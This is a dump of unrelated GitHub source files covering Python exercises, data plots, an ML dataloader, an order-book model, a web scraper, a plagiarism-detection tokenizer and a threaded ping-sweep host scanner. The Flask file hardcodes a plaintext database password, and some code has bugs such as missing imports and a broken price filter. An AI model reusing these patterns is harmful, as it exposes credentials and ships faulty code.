exclude in path:\n return False\n return True\n\ndef accumulate_sources(arg, dirname, fnames):\n for fname in fnames:\n path = os.path.join(dirname, fname)\n path = relpath(path, srcdir)\n if not should_lint(path):\n continue\n arg.append(path)\n\nsources_list = []\nos.path.walk(srcdir,accumulate_sources,sources_list)\nsources_list.sort()\nfor path in sources_list:\n lint_path(path)\nclean_lints(sources_list)\n\noutput.close()\n","repo_name":"posulliv/stad","sub_path":"config/make-lint.py","file_name":"make-lint.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4375445093","text":"# 
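`ChangeProtectedFile` above is the write-compare-swap idiom: build the new content in a side file and only replace the target when the bytes differ, so make-style tools never see a touched mtime for an unchanged file. A compact equivalent:

```python
import os

def write_if_changed(path: str, text: str) -> bool:
    """Return True if the file was (re)written, False if content was identical."""
    try:
        with open(path) as f:
            if f.read() == text:
                return False          # unchanged: leave the mtime alone
    except FileNotFoundError:
        pass                          # first write
    tmp = path + ".new"
    with open(tmp, "w") as f:
        f.write(text)
    os.replace(tmp, path)             # atomic rename on POSIX
    return True
```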
Exercise 1\n# Build a product registration system backed by a product list\n# Your system must:\n# - Ask the user which product will be registered via an input\n# - Guarantee that upper- or lower-case input still refers to the same product\n# - If the user enters a product that already exists in the list, print the message \"Product already exists, try again\"\n# - If the user enters a product that is not in the list, insert it into the list, print the message Product X registered successfully and then print the complete list\n\nprodutos = [\"celular\", \"camera\", \"fone de ouvido\", \"monitor\"]\n\nprint('***PRODUCT REGISTRATION***')\nprint(produtos)\nprint('Type \"fim\" to finish',end='\\n\\n')\n\nwhile True:\n    \n    novo_produto=input('Enter the product name: ')\n    if novo_produto=='fim':\n        print('PROGRAM FINISHED!')\n        break\n\n    elif novo_produto.casefold() not in produtos:\n        produtos.append(novo_produto.casefold())\n        print('Product {} registered successfully!'.format(novo_produto))\n        print(produtos,end='\\n\\n')\n\n    else:\n        print('Product already exists, try again!')\n\n\n\n\n# Exercise 2\n# Build a price lookup system\n# Your system must:\n# - Ask the user for the name of a product\n# - If the product exists in the product list, the program must return the product's price as the answer\n# - E.g.: The product celular costs R$1500\n# - If the product does not exist in the product list, the program must print a message telling the user to try again\nprodutos = [\"celular\", \"camera\", \"fone de ouvido\", \"monitor\"]\nprecos = [1500, 1000, 800, 2000]\n\n\n# Exercise 3\n# Build an employee bonus lookup system\n# Your system must:\n# - Get the employee's sales total via an input\n# - Compute the employee's bonus according to the following rule:\n# - If the employee sold more than 1000 units, they earn R$2 of bonus for each unit sold\n# - If the employee sold more than 5000 units, they earn R$2 of bonus per unit + a fixed amount of R$1000\n# - If the employee sold fewer than 1000 units, they earn no bonus\n# - Print the employee's bonus amount at the end\n\n\n# Exercise 4\n# Write a program that can find out which of the salespeople sold the most\n# The salespeople's sales are lists with the quantity sold by each salesperson\n\nvendas = [\n    [10, 20, 100, 80, 90, 100, 20, 30, 44, 55, 33, 34, 100, 90, 80, 39, 87, 45, 50, 50, 50, 50, 40, 30, 3, 93, 39, 49, 88], \n    [100, 1, 1, 4, 5, 90, 100, 20, 4, 5, 100, 100, 100, 100, 100, 93, 20, 15, 40, 90, 90, 90, 90, 90, 90, 33, 22, 44, 43, 34],\n]","repo_name":"jharbes/hashtagPython","sub_path":"008-listas-metodosEUsos/14-opcional-exercicios_extras_de_listas/listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41875147995","text":"from flask import Flask,request,render_template\r\nfrom models import *\r\n\r\napp = Flask(__name__)\r\nPOSTGRES = {\r\n    'user': 'postgres',\r\n    'pw': 'rakib1602066',\r\n    'db': 'mydatabase',\r\n    'host': 'localhost',\r\n    'port': '5432',\r\n}\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://%(user)s:\\\r\n%(pw)s@%(host)s:%(port)s/%(db)s' % POSTGRES\r\n#app.config[\"SQLALCHEMY_DATABASE_URL\"]=\"postgresql://postgres:rakib1602066@localhost/mydatabase\"\r\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = 
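Exercises 2-4 in the record above are left unsolved. A short sketch for Exercise 2: the two lists are parallel, so a product's price sits at the same index as its name.

```python
produtos = ["celular", "camera", "fone de ouvido", "monitor"]
precos = [1500, 1000, 800, 2000]

name = input('Enter the product name: ').casefold()
if name in produtos:
    # parallel lists: same position in both
    print(f'The product {name} costs R${precos[produtos.index(name)]}')
else:
    print('Product not found, try again!')
```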
False\r\ndb.init_app(app)\r\n\r\n\r\ndef main():\r\n db.create_all()\r\n\r\n\r\nif __name__ == '__main__':\r\n with app.app_context():\r\n main()\r\n\r\n\r\n","repo_name":"RakibulIslamRakib/cs50","sub_path":"ORM/2create.py","file_name":"2create.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13032491757","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# 数据\niris = pd.read_csv('data/iris.csv')\nprint(iris.head())\n\n# 例子 1:\nsns.pairplot(iris, hue='Name', diag_kind='kde', size=2);\nplt.show()\n\n# 例子 2:\nplt.figure(figsize=(8,6))\nplt.subplot(121)\nsns.swarmplot('Name', 'PetalLength', data=iris);\nplt.subplot(122)\nsns.violinplot('Name', 'PetalLength', data=iris);\nplt.show()\n","repo_name":"shijiansu/coursera-applied-data-science-with-python","sub_path":"2_applied_data_representation/w4_applied_visualizations/1_pandas_visualization/5_seaborn_iris.py","file_name":"5_seaborn_iris.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20344186140","text":"import re\r\nimport sys\r\nimport os\r\nimport socket\r\nimport datetime\r\nimport subprocess\r\nimport threading\r\n\r\nhosts_up = 0\r\nhosts_down = 0\r\n\r\n#Function to find the ip address of the user.\r\ndef get_host_ip():\r\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\ts.connect((\"8.8.8.8\",80))\r\n\treturn s.getsockname()[0]\r\n\r\n#Fucntion to check whether an IP is alive.\r\ndef check_ip(IP):\r\n\tglobal hosts_up\r\n\tglobal hosts_down\r\n\ttry:\r\n\t\tif subprocess.call([\"ping\", IP],stdout=subprocess.PIPE) == 0: #This command peforms a ping request on the IP.\r\n\t\t\thosts_up = hosts_up + 1 #Counter for the number of live hosts\r\n\t\t\tprint(date_and_time + \" [+] {}: host is up.\".format(IP) + \" Number: \" + str(hosts_up)) \r\n\t\telse:\r\n\t\t\thosts_down = hosts_down + 1 #Counter for the number hosts down\r\n\t\t\tpass\r\n\t\t\t\r\n\texcept OSError:\r\n\t\tprint(date_and_time+\" [*] Unreachable Netowrk.\")\r\n\r\n\texcept KeyboardInterrupt:\r\n\t\tprint(\"[+] Cancelled!\")\r\n\t\tsys.exit()\r\n\r\ndef main_program():\r\n\tglobal date_and_time\r\n\ttry:\r\n\t\tnet = str(sys.argv[1]) #Takes the argument from the user.\r\n\r\n\t\tif net ==\"-h\": \r\n\t\t\tprint(\" Help\\n-----------\\nUsage: python pingsweep.py \\nEg: python pingsweep.py 127.0.0.1\\nEg: python pingsweep.py 127.0.0.1/24\") #Displays a help list.\r\n\t\t\tsys.exit()\r\n\r\n\t\telse:\r\n\t\t\tpass\r\n\r\n\texcept IndexError: #This exception handles a case where the user provides no argumnets.\r\n\t\tnet1 = (get_host_ip()).split(\".\")[:3]\r\n\t\tnet = \".\".join(net1) + \".0/24\"\r\n\r\n\r\n\r\n\tdate_and_time = str(datetime.datetime.now()) #show date and time.\r\n\tprint(date_and_time + \" [+] Scan started.\") \r\n\r\n\r\n\ttry:\r\n\t\tif re.search('/',net): #Searches for '/' in the argument provided by the user. 
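One portability note on the seaborn record above: `pairplot`'s `size=` argument was renamed to `height=` in seaborn 0.9, so on current versions the call needs updating. Using the dataset bundled with seaborn (lowercase column names, `species` instead of `Name`):

```python
import seaborn as sns
import matplotlib.pyplot as plt

iris = sns.load_dataset('iris')  # fetched and cached by seaborn itself
sns.pairplot(iris, hue='species', diag_kind='kde', height=2)  # height, not size
plt.show()
```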
\r\n\t\t\tif int(net.split(\"/\")[1]) > 24: #This condition checks whether the argument give by the user is out of range.\r\n\t\t\t\tprint(date_and_time + \" [-] {}: is not in your IP range.\".format(net))\r\n\r\n\t\t\telse:\r\n\t\t\t\ttotal = int(net[-2:]) + 230\r\n\t\t\t\tnet2 = net.split(\".\")[-1]\r\n\t\t\t\tnet3 = net2.split(\"/\")[-2]\r\n\t\t\t\tnet4 = net.split(\".\")\r\n\t\t\t\tthreads = []\r\n\t\t\t\tfor i in range(int(net3),total):\r\n\t\t\t\t\tip_range = f'''{\".\".join(net4[:3])}.{str(i)}'''\r\n\t\t\t\t\tthread = threading.Thread(target=check_ip, args=(ip_range,))\r\n\t\t\t\t\tthreads.append(thread)\r\n\r\n\t\t\t\tfor i in range(len(threads)):\r\n\t\t\t\t\tthreads[i].start()\r\n\r\n\r\n\t\telif int(net.split(\".\")[-1]) > 255: #This condition checks whether the argument give by the user is out of range.\r\n\t\t\tprint(date_and_time + \" [-] {}: is not in your IP range.\".format(net))\r\n\r\n\r\n\t\telse:\r\n\t\t\tcheck_ip(net)\r\n\r\n\texcept ValueError:\r\n\t\tcheck_ip(net)\r\n\r\nif __name__ == '__main__':\r\n\tmain_program()\r\n","repo_name":"theMcSam/IP-scanner","sub_path":"pingsweep.py","file_name":"pingsweep.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38868360034","text":"import numpy as np\nfrom scipy import integrate\nimport matplotlib.pyplot as plt\nimport h5py\n\n# Reading the data file for Phi4\nfile_name_psi=\"/home/ashok/gravitational_wave_memory_project/data/rMPsi4_Asymptotic_GeometricUnits_CoM.h5\"\nf_psi = h5py.File(file_name_psi,'r+')\n\n# Reading the strain data\nfile_name_h=\"/home/ashok/gravitational_wave_memory_project/data/rhOverM_Asymptotic_GeometricUnits_CoM.h5\"\nf_h = h5py.File(file_name_h,'r+')\n\n\n#reading data for time and l2m2 mode\ndata_psi = f_psi['Extrapolated_N4.dir']['Y_l2_m2.dat'][:]\ndata_h = f_h['Extrapolated_N4.dir']['Y_l2_m2.dat'][:]\ntime = np.array([])\nd2h22_real_by_dt2 = np.array([])\nd2h22_imag_by_dt2 = np.array([])\nh22_real_SXS=np.array([])\nh22_imag_SXS=np.array([])\n\n\nfor i in range(len(data_psi)):\n\ttime=np.append(time, data_psi[:][i][0])\n\td2h22_real_by_dt2=np.append(d2h22_real_by_dt2, data_psi[:][i][1])\n\td2h22_imag_by_dt2=np.append(d2h22_imag_by_dt2, data_psi[:][i][2])\n\th22_real_SXS=np.append(h22_real_SXS,data_h[:][i][1])\n\th22_imag_SXS=np.append(h22_imag_SXS,data_h[:][i][2])\n\n\n#intergrating the Phi4 data with respect to time first time\ndhSXS_dt_initial_real=np.gradient(h22_real_SXS, time)[0]\ndhSXS_dt_initial_imag=np.gradient(h22_imag_SXS, time)[0]\n\ndh22_real_by_dt=integrate.cumtrapz(d2h22_real_by_dt2, time,initial=0)\ndh22_imag_by_dt=integrate.cumtrapz(d2h22_imag_by_dt2, time, initial=0)\n\n#integrating the data second time with respect to time\n\nh22_real=integrate.cumtrapz(dh22_real_by_dt, time, initial=0)\nh22_imag=integrate.cumtrapz(dh22_imag_by_dt, time, initial=0)\n\n#making plots\nplt.plot(time, h22_real, 'g', label=\"h22 real\")\nplt.plot(time, h22_real_SXS,'r--', label=\"h22 real SXS\")\nplt.xlabel('time')\nplt.ylabel('h22 amplitude')\nplt.legend()\nplt.show()\n\nplt.plot(time, h22_real-h22_real_SXS)\nplt.plot(time, h22_imag-h22_imag_SXS)\nplt.show()\n\n#plt.savefig(\"/home/ashok/gravitational_wave_memory_project/plots/h22_plot2.pdf\")\n\n# Plot Psi4 data\ndh22_real_SXS_by_dt = np.gradient(h22_real_SXS, time)\ndh22_imag_SXS_by_dt = np.gradient(h22_imag_SXS, time)\n\nd2h22_real_SXS_by_dt2=np.gradient(dh22_real_SXS_by_dt, time)\nd2h22_imag_SXS_by_dt2=np.gradient(dh22_imag_SXS_by_dt, 
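The CIDR handling in `pingsweep` above slices octets by hand (`int(net[-2:]) + 230` only works for two-digit masks near /24). The standard-library `ipaddress` module expands any block correctly and excludes the network and broadcast addresses:

```python
import ipaddress

net = ipaddress.ip_network("192.168.1.0/24", strict=False)
targets = [str(ip) for ip in net.hosts()]
print(len(targets), targets[0], targets[-1])  # 254 192.168.1.1 192.168.1.254
```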
time)\n\nplt.plot(time,d2h22_real_SXS_by_dt2,'r--' )\nplt.plot(time,d2h22_real_by_dt2,'k' )\nplt.show()\n\n#Subtract linearfit\nlinear_fit_coeff_real = np.polyfit(time, h22_real, 3)\nlinear_fit_coeff_imag = np.polyfit(time, h22_imag, 3)\n\nlinear_fit_real=linear_fit_coeff_real[0]*time + linear_fit_coeff_real[1]\nplt.plot(time, h22_real-linear_fit_real,'r--', label=\"linear fit sub from h22\")\nplt.plot(time, h22_real_SXS, 'g', label=\"h22 SXS\")\nplt.legend()\nplt.show() \n\n\n\n\n\n\n \n \n\n\n\n\n\n","repo_name":"aschoudry/GWmemory","sub_path":"scripts/plot_h22mode.py","file_name":"plot_h22mode.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15982972632","text":"import torch\nimport torch.nn as nn\nimport torch.utils.data as data\n\nclass Template_SegmentationDataLoader(data.Dataset):\n def __init__(self, img_root, mask_root, img_list_path=None,\n pair_transform=None, input_transform=None, target_transform=None,\n load_all_in_ram=True, img_ext=\".jpg\", mask_ext=\".png\", return_original=False):\n \"\"\"\n args:\n img_root: str\n root directory of images.\n\n mask_root: str\n root directory of mask images.\n\n img_list_path: str\n path to the file which is written a image name.\n if this is \"not\" None, it will only use this image written in this file.\n it is considered to be like\n img_001\n img_002\n img_003\n .\n .\n .\n in the file.\n if this is None, it will read all file in the img_root directory.\n in this scenario, if you set load_all_in_ram=False, it might raise some\n errors if there is a non opneable file with PIL in the directory or no pairs.\n setting the option of img_exr, or mask_ext to use different extensions.\n\n pair_transform: function\n function that compose transform to PIL.Image object for image and mask.\n this function must take 2 PIL.Image object which is (image, mask).\n if it is None, nothing will be done.\n\n input_transform: function\n function that compose transform to PIL.Image object for image.\n torchvision.transforms is considered as a typical function.\n if it is None, transforms.ToTensor will only be performed.\n\n target_transform: function\n function that compose transform to PIL.Image object for mask.\n torchvision.transforms is considered as a typical function.\n if it is None, it will convert to torch.LongTensor.\n\n load_all_in_ram: bool\n if this is True. 
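In the gravitational-wave script above, the drift removal fits a cubic (`np.polyfit(time, h22_real, 3)`) but then subtracts `coeff[0]*time + coeff[1]`. Since `np.polyfit` returns coefficients highest degree first, those are the cubic and quadratic coefficients, not a linear trend. For a linear detrend the degree should be 1, evaluated with `np.polyval`:

```python
import numpy as np

t = np.linspace(0.0, 10.0, 101)
h = 0.3 * t + 1.0 + 0.05 * np.sin(t)   # toy signal with a linear drift
coeff = np.polyfit(t, h, 1)            # degree 1 -> [slope, intercept]
detrended = h - np.polyval(coeff, t)   # polyval matches polyfit's ordering
print(np.round(coeff, 2))              # approximately [0.3, 1.0]
```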
the all dataset image will be loaded on the memory.\n if you cause no memory problem, you can set this to False,\n and this loader will only load the file paths at the initial moment.\n\n img_ext: str\n extension for image.\n mask_ext: str\n extension for mask image.\n \"\"\"\n\n self.input_transform = input_transform\n self.target_transform = target_transform\n self.pair_transform = pair_transform\n self.load_all_in_ram = load_all_in_ram\n self.img_ext = img_ext\n self.mask_ext = mask_ext\n self.return_original = return_original\n\n # all images must have pairs\n if img_list_path is None:\n name_list = []\n image_list = os.listdir(os.path.join(img_root))\n for name in image_list:\n name_list.append(name.replace(img_ext, \"\").replace(mask_ext, \"\"))\n\n image_list = list(set(*name_list))\n\n else:\n with open(os.path.join(img_list_path), \"r\") as file:\n image_list = file.readlines()\n image_list = [img_name.rstrip(\"\\n\") for img_name in image_list]\n\n self.image_names = image_list\n\n self.imgs = []\n self.mask_imgs = []\n\n for img_name in self.image_names:\n try:\n if load_all_in_ram:\n _img = Image.open(os.path.join(img_root, img_name+self.img_ext)).convert('RGB')\n _mask_img = Image.open(os.path.join(mask_root, img_name+self.mask_ext)).convert('P')\n else:\n _img = os.path.join(img_root, img_name+self.img_ext)\n _mask_img = os.path.join(mask_root, img_name+self.mask_ext)\n\n\n self.imgs.append(_img)\n self.mask_imgs.append(_mask_img)\n\n except Exception as e:\n print(e)\n print(\"pass {}\".format(img_name))\n\n self.data_num = len(self.imgs)\n \n def __getitem__(self, index):\n if self.load_all_in_ram:\n img = self.imgs[index]\n mask = self.mask_imgs[index]\n else:\n img = Image.open(self.imgs[index]).convert('RGB')\n mask = Image.open(self.mask_imgs[index]).convert('P')\n\n if self.pair_transform is not None:\n _img, _mask_img = self.pair_transform(img, mask)\n else:\n _img = img\n _mask_img = mask\n\n if self.return_original:\n original_img = _img.copy()\n \n if self.input_transform is not None:\n _img = self.input_transform(_img)\n else:\n _img = torch.from_numpy(np.asarray(_img).transpose(2,0,1)).type(torch.FloatTensor)\n \n if self.target_transform is not None:\n _mask_img = self.target_transform(_mask_img)\n else:\n _mask_img = torch.from_numpy(np.asarray(_mask_img)).type(torch.LongTensor)\n\n if self.return_original:\n return _img, _mask_img, torch.from_numpy(np.asarray(original_img)).type(torch.LongTensor)\n\n return _img, _mask_img\n\n def __len__(self):\n return self.data_num\n","repo_name":"a-maumau/mau_ml_util","sub_path":"templates/template_data_loader.py","file_name":"template_data_loader.py","file_ext":"py","file_size_in_byte":5525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21827807257","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom typing import Optional, Sequence, Tuple\nfrom dataclasses import replace\n\n\n'''\nFacilitates matching stock buyers with stock sellers\n\nBuyers and sellers express intrest to trade by:\nBids (intent to buy)\nasks (intent to sell)\nknown as limit orders\n\"limit\" only interested in buying below a certain price levels\nea LO = (P, N) ; P = price, N = shares\n=> buy LO (P, N) = willing to buy N shares at price <= P\n\nOtehr type:\nMarket Order (MO)\nstates one intet to buy/sell N shares at the best possible price(S) available \non OB at the time of MO submission\n'''\n\n@dataclass(frozen = True)\nclass DollarsAndShares: \n '''\n 
Can represent an LO\n or pair of total dollors transacted when MO exectuted\n '''\n dollars: float\n shares: int\nPriceSizePairs = Sequence[DollarsAndShares]\n\n@dataclass(frozen=True)\nclass OrderBook:\n\n descending_bids: PriceSizePairs\n ascending_asks: PriceSizePairs\n\n def bid_price(self) -> float:\n return self.descending_bids[0].dollars\n \n def ask_price(self) -> float:\n return self.ascending_asks[0].dollars\n \n def mid_price(self) -> float:\n return (self.bid_price() + self.ask_price()) / 2\n \n def bid_ask_spread(self) -> float:\n return self.ask_price() - self.bid_price()\n\n def market_depth(self) -> float:\n return self.ascending_asks[-1].dollars - \\\n self.descending_bids[-1].dollars\n\n @staticmethod\n def eat_book(\n ps_pairs: PriceSizePairs, \n shares: int) -> Tuple[DollarsAndShares, PriceSizePairs]:\n '''\n Method for LO and MO interaction with OrderBook\n '''\n rem_shares: int = shares\n dollars: float = 0\n for i, d_s in enumerate(ps_pairs):\n this_price: float = d_s.dollars\n this_shares: int = d_s.shares\n dollars += this_price * min(rem_shares, this_shares)\n if rem_shares < this_shares:\n return(\n DollarsAndShares(dollars=dollars, shares=shares),\n [DollarsAndShares(\n dollars=this_price,\n shares=this_shares - rem_shares\n )] + list(ps_pairs[i+1:])\n )\n else:\n rem_shares -= this_shares\n return (\n DollarsAndShares(dollars=dollars, shares=shares - rem_shares),\n []\n )\n \n def sell_limit_order(self, price: float, shares: int) -> \\\n Tuple[DollarsAndShares, OrderBook]:\n \n index: Optional[int] = next((i for i, d_s\n in enumerate(self.descending_bids)), None)\n eligible_bids: PriceSizePairs = self.descending_bids \\\n if index is None else self.descending_bids[:index]\n ineligible_bids: PriceSizePairs = [] if index is None else \\\n self.descending_bids[index:]\n\n d_s, rem_bids = OrderBook.eat_book(eligible_bids, shares)\n new_bids: PriceSizePairs = list(rem_bids) + list(ineligible_bids)\n rem_shares: int = shares - d_s.shares\n\n if rem_shares > 0:\n new_asks: list[DollarsAndShares] = list(self.ascending_asks)\n index1: Optional[int] = next((i for i, d_s\n in enumerate(new_asks)\n if d_s.dollars >= price), None)\n \n if index1 is None:\n new_asks.append(DollarsAndShares(\n dollars=price,\n shares=rem_shares\n ))\n elif new_asks[index1].dollars != price:\n new_asks.insert(index1, DollarsAndShares(\n dollars=price,\n shares=rem_shares\n ))\n else:\n new_asks[index1] = DollarsAndShares(\n dollars=price,\n shares=new_asks[index1].shares + rem_shares\n )\n return d_s, OrderBook(\n ascending_asks=new_asks,\n descending_bids=new_bids\n )\n else:\n return d_s, replace(\n self,\n descending_bids=new_bids\n )\n \n def sell_market_order(\n self, \n shares: int\n ) -> Tuple[DollarsAndShares, OrderBook]:\n d_s, rem_bids = OrderBook.eat_book(\n self.descending_bids, \n shares\n )\n return (d_s, replace(self, descending_bids=rem_bids))\n\n def pretty_print_order_book(self) -> None:\n from pprint import pprint\n print()\n print(\"Bids\")\n pprint(self.descending_bids)\n print()\n print(\"Asks\")\n print()\n pprint(self.ascending_asks)\n print()\n \n def display_order_book(self) -> None:\n import matplotlib.pyplot as plt\n\n bid_prices = [d_s.dollars for d_s in self.descending_bids]\n bid_shares = [d_s.shares for d_s in self.descending_bids]\n if self.descending_bids:\n plt.bar(bid_prices, bid_shares, color='blue')\n\n ask_prices = [d_s.dollars for d_s in self.ascending_asks]\n ask_shares = [d_s.shares for d_s in self.ascending_asks]\n if self.ascending_asks:\n 
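The `index` computation in `sell_limit_order` above has lost its filter: `next((i for i, d_s in enumerate(self.descending_bids)), None)` returns 0 whenever any bid exists, so `eligible_bids` is always empty and a sell limit order never crosses the book. The presumed intent is to stop at the first bid priced below the seller's limit:

```python
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class DS:
    dollars: float
    shares: int

def first_bid_below(descending_bids, price: float) -> Optional[int]:
    # bids[:index] are then exactly the bids priced >= the sell limit
    return next((i for i, d_s in enumerate(descending_bids) if d_s.dollars < price), None)

bids = [DS(100, 10), DS(99, 5), DS(98, 20)]
print(first_bid_below(bids, 99))  # 2 -> a 99 sell LO may eat bids[:2]
```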
plt.bar(ask_prices, ask_shares, color='red')\n\n all_prices = sorted(bid_prices + ask_prices)\n all_ticks = [\"%d\" % x for x in all_prices]\n plt.xticks(all_prices, all_ticks)\n plt.grid(axis='y')\n plt.xlabel(\"Prices\")\n plt.ylabel(\"Number of Shares\")\n plt.title(\"Order Book\")\n #plt.xticks(x_pos, x)\n plt.show()\n\nif __name__ == \"__main__\":\n \n from numpy.random import poisson\n\n bids: PriceSizePairs = [DollarsAndShares(\n dollars=x,\n shares=poisson(100. - (100 - x) * 10)\n ) for x in range(100, 90, -1)]\n asks: PriceSizePairs = [DollarsAndShares(\n dollars=x,\n shares=poisson(100. - (x - 105) * 10)\n ) for x in range(105, 115, 1)]\n # initialise a testing OrderBook\n ob0: OrderBook = OrderBook(descending_bids=bids, ascending_asks=asks)","repo_name":"hadwi537/OrderBook","sub_path":"OrderBook/OrderBook.py","file_name":"OrderBook.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24396138626","text":"import scrapy\n\n\nclass GlassesSpider(scrapy.Spider):\n name = 'glasses'\n allowed_domains = ['www.glassesshop.com']\n \n def start_requests(self):\n yield scrapy.Request(url='https://www.glassesshop.com/bestsellers',callback=self.parse, headers={\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36'\n })\n\n def parse(self, response):\n glasses = response.xpath(\"//div[@id='product-lists']/div\")\n for glasses_ in glasses:\n yield {\n 'url': glasses_.xpath(\".//div[@class='product-img-outer']/a/@href\").get(),\n 'image_url': glasses_.xpath(\".//img[@class='lazy d-block w-100 product-img-default']/@src\").get(),\n 'product_name': glasses_.xpath(\"normalize-space(.//div[@class='p-title']/a/text())\").get(),\n 'price': glasses_.xpath(\".//div[@class='p-price']//span/text()\").get(),\n # 'User-Agent': response.request.headers['User-Agent']\n }\n next_page = response.xpath(\n \"//ul[@class='pagination']/li[position()=last()]/a/@href\").get()\n if next_page:\n yield scrapy.Request(url=next_page, callback=self.parse,headers={\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36'\n })\n\n ","repo_name":"david-adds/glassesshop-spider","sub_path":"glassesshop/spiders/glasses.py","file_name":"glasses.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32376187655","text":"\"\"\"\nWrite a function that, given three integers A, B and K, \nreturns the number of integers within the range [A..B] that are divisible by K.\nFor example, for A = 6, B = 11 and K = 2, your function should return 3.\n\"\"\"\n\ndef solution(A, B, K):\n if A % K == 0: \n # we add 1 to the count because A itself is divisible by K\n return (B - A) // K + 1\n else: \n # we subtract A % K from A to round down to the previous multiple of K; \n # counting from there, (B - (A - A % K)) // K multiples of K lie in [A..B] \n return (B - (A - A % K )) // K\n\nA = 6\nB = 11\nK = 2\nprint(solution(A,B,K))\n","repo_name":"ssuzana/codility-practice","sub_path":"05-prefix-sums/CountDiv.py","file_name":"CountDiv.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7274285830","text":"\"\"\"This module contains functions for tokenizing/filtering code\nas well as generic functions for detecting overlap between two\ndocuments.
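 Typical use: fingerprint each document with get_document_fingerprints, then compare the fingerprints with find_fingerprint_overlap.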
\n\"\"\"\n\nimport logging\nimport warnings\nfrom typing import Dict, List\n\nfrom pygments import lexers, token\nimport pygments.util\nimport numpy as np\nfrom markupsafe import escape\n\n# if the C extension is available, use it. For almost all use cases\n# the speed difference is not significant so if the C extension isn't\n# found copydetect will silently switch to the python implementation.\ntry:\n from .winnow import _winnow\nexcept (ModuleNotFoundError, ImportError):\n from .pywinnow import _winnow\n\ndef filter_code(code, filename, language=None):\n \"\"\"Tokenize and filter a code document. Replace variable names with\n V, function names with F, object names with O, and strings with S.\n Return the filtered document and a list of offsets indicating how\n many characters were removed by filtering at each index in the\n resulting document where filtering occurred (this is used later to\n highlight the original code using plagiarism detection results on\n the filtered code)\n \"\"\"\n try:\n if language is not None:\n lexer = lexers.get_lexer_by_name(language)\n else:\n lexer = lexers.get_lexer_for_filename(filename)\n tokens = lexer.get_tokens(code)\n except pygments.util.ClassNotFound:\n logging.warning(f\"{filename} not tokenized: unknown file extension\")\n return code, np.array([])\n\n if lexer == pygments.lexers.TextLexer:\n logging.warning(f\"did not tokenize plaintext file {filename}\")\n return code, np.array([])\n\n out_code = \"\"\n offset = 0\n offsets = [[0,0]]\n variable_tokens = {token.Name, token.Name.Variable, token.Name.Attribute}\n for t in tokens:\n if t[0] in variable_tokens:\n out_code += \"V\"\n offsets.append([len(out_code) - 1, offset])\n offset += len(t[1]) - 1\n elif t[0] in token.Name.Function:\n out_code += \"F\"\n offsets.append([len(out_code) - 1, offset])\n offset += len(t[1]) - 1\n elif t[0] in token.Name.Class:\n out_code += \"O\"\n offsets.append([len(out_code) - 1, offset])\n offset += len(t[1]) - 1\n elif t[0] == token.Comment.Preproc or t[0] == token.Comment.Hashbang:\n out_code += \"P\"\n offsets.append([len(out_code) - 1, offset])\n offset += len(t[1]) - 1\n elif t[0] in token.Text or t[0] in token.Comment:\n offsets.append([len(out_code) - 1, offset])\n offset += len(t[1])\n elif t[0] in token.Literal.String:\n if t[1] == \"'\" or t[1] == '\"':\n out_code += '\"'\n else:\n out_code += \"S\"\n offsets.append([len(out_code) - 1, offset])\n offset += len(t[1]) - 1\n else:\n out_code += t[1]\n return out_code, np.array(offsets)\n\ndef hashed_kgrams(string, k):\n \"\"\"Return hashes of all k-grams in a string\"\"\"\n hashes = [hash(string[offset:offset+k])\n for offset in range(len(string) - k + 1)]\n return np.array(hashes)\n\ndef winnow(hashes, window_size, remove_duplicates=True):\n \"\"\"Implementation of the robust winnowing algorithm described in\n https://theory.stanford.edu/~aiken/publications/papers/sigmod03.pdf\n Returns a list of selected hashes and the indexes of those hashes.\n \"\"\"\n if window_size < 1:\n raise ValueError(\"window_size must be greater than 0\")\n\n # window size of 1 will just select all hashes\n if window_size == 1:\n selected_hashes = hashes\n selected_idx = np.arange(len(hashes))\n else:\n selected_idx = _winnow(hashes, window_size)\n selected_hashes = hashes[selected_idx]\n\n if remove_duplicates:\n selected_hashes, unique_idx = np.unique(selected_hashes,\n return_index=True)\n selected_idx = selected_idx[unique_idx]\n\n return selected_hashes, selected_idx\n\ndef get_copied_slices(idx, k):\n 
